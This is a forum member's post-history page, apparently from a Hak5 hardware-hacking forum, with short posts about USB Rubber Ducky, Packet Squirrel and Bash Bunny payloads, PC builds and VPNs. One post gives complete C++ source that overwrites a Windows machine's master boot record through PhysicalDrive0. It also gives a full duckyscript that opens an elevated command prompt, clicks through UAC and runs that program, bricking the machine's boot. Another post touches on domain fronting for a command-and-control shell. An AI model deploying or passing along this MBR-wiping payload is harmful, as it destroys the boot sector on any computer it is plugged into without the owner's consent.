Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by ThoughtfulDev

  1. How about using Domain Fronting? You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.
  2. be quiet! Silent Base 800 Black, No Window ASUS Prime X370-Pro AMD Ryzen 7 1700X 2x8GB Vengeance DDR4-3200 be quiet! Silent Loop 120mm MSI GTX 770 Samsung 850 Evo 250GB SSD 550 Watt Corsair Semi Modular PSU (dont know the actual name rn) Wanted to buy a new GPU for Machine Learning but prices are so damn high...
  3. Yep when i run it seperatly on another switch it works fine but it wont work when using PopsWRT sadly.
  4. Everything works. Except the tcpdump. A folder on the external Storage is created but there are not tcpdump logs in there. (normal tcpdump works fine) Logs says that tcpdump has been started and is finished so i have no idea what could be wrong. (and yes i switched it to bridge before trying that).
  5. Woah thats dope. Will test as much features as i can and will report back ;) @Dave-ee Jones have you thought about minifying the bootstrap-iso.css to save a few bytes since storage is gold on the PS? :D
  6. Did you changed the Keyboard layout to "es" when compiling the duckyscript?
  7. Reminds me of my PyDuckGen. But seems like your script works ;) (I have a look if i can improve your script)
  8. Did you even changed something? Don't think so...so check the code and try to get the iptables/tor stuff from it.
  9. For this payload set the netmode to transparent and use the br-lan interface.
  10. There was a discussion about this here:
  11. I described the issue here. The one in the repository , which is the updated version, (https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel) should works fine.
  12. I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx
  13. this is wrong no quotes and = are needed to it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
  14. that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.
  15. Wow thats a nice idea :) Thanks for sharing. I might convert this script to a USB Rubber Ducky (since its not that hard)
  16. As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?
  17. The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)
  18. I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them. This is basic metasploit stuff... maybe you should have a look at metasploit minute.
  19. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe
  20. try encoding in your keyboard layout (default is US)
  21. You can run powershell and cmd without admin privs or am i mistaken? e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.
  22. I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
  • Create New...